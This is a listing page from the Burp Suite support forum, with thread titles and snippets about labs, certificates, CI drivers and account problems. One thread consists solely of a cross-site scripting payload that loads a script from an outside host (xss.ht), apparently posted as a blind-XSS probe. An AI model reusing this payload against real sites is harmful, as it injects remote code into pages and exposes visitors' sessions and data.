Burp Suite User Forum

Login to post

Complete the OS Injection Labs?

Hello all! How can I complete the OS Injection labs without Burp Suite Pro? The instructions instruct me to use the public Burp Collaborator server...

Last updated: Jul 02, 2020 03:47PM UTC | 1 Agent replies | 0 Community replies | How do I?

Configuring a Burp root CA certificate in iOS13

Finally got this working!!! Here are the full instructions: 1. Generate a certificate with the following commands (notice the extendedKeyUsage addition to Nick's answer above) openssl req -x509 -nodes -newkey rsa:4096...

Last updated: Jul 02, 2020 03:05PM UTC | 1 Agent replies | 1 Community replies | How do I?

Creating new site using graphql

I am new to graphql. I've been able to run queries, but have not been able to run any mutations. Trying to create a new site using the following query: Python: query = {"mutation": "{create_site(input{name: Mysite,...

Last updated: Jul 02, 2020 12:45PM UTC | 1 Agent replies | 1 Community replies | How do I?

Encounter Error: connection refused when run the generic CI driver locally

Hi team, I run into an issue when I try to run the CI driver locally, I use the burp-ci-driver-1.0.5beta.jar because this version does not require self-signed-certificate, but when I run the scan command, my terminal...

Last updated: Jul 02, 2020 11:04AM UTC | 1 Agent replies | 0 Community replies | How do I?

"><script src=https://site.xss.ht></script>

"><script src=https://site.xss.ht></script>

Last updated: Jul 02, 2020 09:21AM UTC | 0 Agent replies | 0 Community replies | How do I?

in authentication lab Username enumeration via account lock

in authentication lab Username enumeration via account lock i have been brute forcing all the username with adding count parameter in the body and doing as shown in the solution but i only receive response which shows...

Last updated: Jul 02, 2020 09:18AM UTC | 2 Agent replies | 1 Community replies | How do I?

Run Burp Suite in a Non GUI Environment

Hi! First of all Thank you for this wonderful gift that PortSwigger Team have created for InfoSec Community. I have a question regarding running Burp in a full Non GUI Environment, so our team at work right now is trying...

Last updated: Jul 02, 2020 08:08AM UTC | 2 Agent replies | 1 Community replies | How do I?

Encounter Error: connection refused when run the generic CI driver locally

Hi team, I run into an issue when I try to run the CI driver locally, I use the burp-ci-driver-1.0.5beta.jar because this version does not require self-signed-certificate, but when I run the scan command, my terminal...

Last updated: Jul 02, 2020 04:57AM UTC | 0 Agent replies | 0 Community replies | How do I?

Creating new site using graphql

I am new to graphql. I've been able to run queries, but have not been able to run any mutations. Trying to create a new site using the following query: Python: query = {"mutation": "{create_site(input{name: Mysite,...

Last updated: Jul 01, 2020 06:21PM UTC | 0 Agent replies | 0 Community replies | How do I?

There was something wrong with your antiforgery token

Not able to comment due to error: There was something wrong with your antiforgery token

Last updated: Jul 01, 2020 11:22AM UTC | 1 Agent replies | 0 Community replies | How do I?

Academy module - Access control vulnerabilities and privilege escalation Bug report

While trying to solve this lab Lab: User role can be modified in user profile I am not able to login into the user profile with the default credentials given. (You can log in to your own account using wiener:peter.) I...

Last updated: Jul 01, 2020 10:58AM UTC | 1 Agent replies | 0 Community replies | How do I?

Ability to time requests?

I would like to know if there's a feature in the intuder/repeater to send requests in a specific time either configuring the request to trigger at a time (hh:mm:ss) or making it trigger by unix time, if this feature doesn't...

Last updated: Jul 01, 2020 10:32AM UTC | 1 Agent replies | 0 Community replies | How do I?

Complete this training lab for serialized-objects

I have been following the lab below however I cant seem to resolve or not expecting the results burp had found and unable to complete this...

Last updated: Jun 30, 2020 02:35PM UTC | 1 Agent replies | 0 Community replies | How do I?

E-CERTIFICATE

Will portswigger provide an e-certificate after completion of the course?

Last updated: Jun 30, 2020 01:52PM UTC | 1 Agent replies | 0 Community replies | How do I?

Scan configs not getting picked for future scans

I am Loading Burp with configuration through config library. I have changed handling error during audit settings as follows: Pause the task if: 100 consecutive audit items failed. But when I scan things, the...

Last updated: Jun 30, 2020 01:52PM UTC | 1 Agent replies | 0 Community replies | How do I?

Reset password

I forgot the password to login. When I'm trying to reset the password using, adminusercreator, it is asking for database url. I installed burp suite with all default options. In this case, what will the database url? How to...

Last updated: Jun 30, 2020 01:02PM UTC | 1 Agent replies | 0 Community replies | How do I?

Reset password

I forgot the password to login. When I'm trying to reset the password using, adminusercreator, it is asking for database url. I installed burp suite with all default options. In this case, what will the database url? How to...

Last updated: Jun 30, 2020 11:47AM UTC | 0 Agent replies | 0 Community replies | How do I?

problem with sqli

I have been trying to exploit a sqli, because I do not have much knowledge on the subject, I wanted to ask for some opinion on how I could execute a successful sql query i have page vulnerable...

Last updated: Jun 30, 2020 08:22AM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Enterprise ... multiple logins

I wonder if there is a way to have two levels of logging ? - I need to log into the supplier infrastructure to access to my root web application - I need to log into the application to access to the user space Is this...

Last updated: Jun 29, 2020 05:17PM UTC | 1 Agent replies | 0 Community replies | How do I?

No alerts but no connection from Android app

I was able to inspect the traffic from an Android app with a rooted device and burpsuite certificate installed as root certificates. After an update of the app i am no longer able to inspect the traffic. No alert on the...

Last updated: Jun 29, 2020 03:32PM UTC | 2 Agent replies | 1 Community replies | How do I?

Page 1 of 118

Burp Suite Support Center

Your source for help and advice on all things Burp-related.

Burp Suite Support Center image